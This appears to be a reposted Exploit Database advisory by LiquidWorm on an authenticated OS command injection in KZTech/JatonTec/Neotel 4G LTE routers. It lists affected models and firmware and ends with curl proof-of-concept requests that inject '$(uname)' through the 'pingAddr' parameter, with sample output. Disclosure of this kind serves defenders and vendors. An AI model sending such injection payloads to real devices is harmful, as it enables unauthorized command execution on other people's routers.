KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Command Injection (Authenticated)

• Exploit Database
• 95 阅读

• 作者： LiquidWorm
  日期： 2021-03-19
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49680/

• # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
  # Date: 03.02.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
  
  Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
  Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
  http://www.jatontec.com/products/show.php?itemid=258
  http://www.jatontech.com/CAT12.html#_pp=105_564
  http://www.kzbtech.com/AM3300V.html
  Останати пакети
  
  Affected version:Model | Firmware
  -------|---------
   JT3500V | 2.0.1B1064
   JT3300V | 2.0.1B1047
   AM6200M | 2.0.0B3210
   AM6000N | 2.0.0B3042
   AM5000W | 2.0.0B3037
   AM4200M | 2.0.0B2996
   AM4100V | 2.0.0B2988
  AM3500MW | 2.0.0B1092
   AM3410V | 2.0.0B1085
   AM3300V | 2.0.0B1060
   AM3100E | 2.0.0B981
   AM3100V | 2.0.0B946
   AM3000M | 2.0.0B21
   KZ7621U | 2.0.0B14
   KZ3220M | 2.0.0B04
   KZ3120R | 2.0.0B01
  
  Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
  & VoIP CPE product specially designed to enable quick and easy
  LTE fixed data service deployment for residential and SOHO customers.
  It provides high speed LAN, Wi-Fi and VoIP integrated services
  to end users who need both bandwidth and multi-media data service
  in residential homes or enterprises. The device has 2 Gigabit LAN
  ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
  CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
  and firewall software for security. It provides an effective
  all-in-one solution to SOHO or residential customers. It can
  deliver up to 1Gbps max data throughput which can be very
  competitive to wired broadband access service.
  
  Desc: The application suffers from an authenticated OS command
  injection vulnerability. This can be exploited to inject and
  execute arbitrary shell commands through the 'pingAddr' HTTP
  POST parameter bypassing the injection protection filter.
  
  Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
   Linux 2.6.36+ (mips)
   Mediatek APSoC SDK v4.3.1.0
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5635
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
  
  
  03.02.2021
  
  --
  
  
  #JT3300V/AM3300V
  lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
  --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
  -H "Cookie: kz_userid=admin:311139" \
  -H "X-Requested-With: XMLHttpRequest"
  ping: bad address 'Linux'
  lqwrm@metalgear:~/prive$ 
  
  
  #JT3500V
  lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
  --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
  -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
  -H "X-Requested-With: XMLHttpRequest"
  ping: bad address 'Linux'
  lqwrm@metalgear:~/prive$
  

  Python

  Copy